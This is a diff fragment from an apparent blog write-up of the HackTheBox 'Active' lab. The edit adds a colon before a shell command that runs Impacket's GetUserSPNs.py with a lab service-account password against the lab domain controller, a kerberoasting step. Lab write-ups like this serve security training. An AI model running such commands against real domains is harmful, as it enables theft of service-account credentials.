dumbx90/dumbx90.github.io/_posts/2019-12-26-Active-HackTheBox-writeup.md

-So the administrator is configured with SPN that can be used for achieve a "kerberoasting"
+So the administrator is configured with SPN that can be used for achieve a "kerberoasting":

 ```bash
 dumbland () hackthebox/active/recon :: ~/pentest/impacket/examples/GetUserSPNs.pyactive.htb/svc_tgs:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100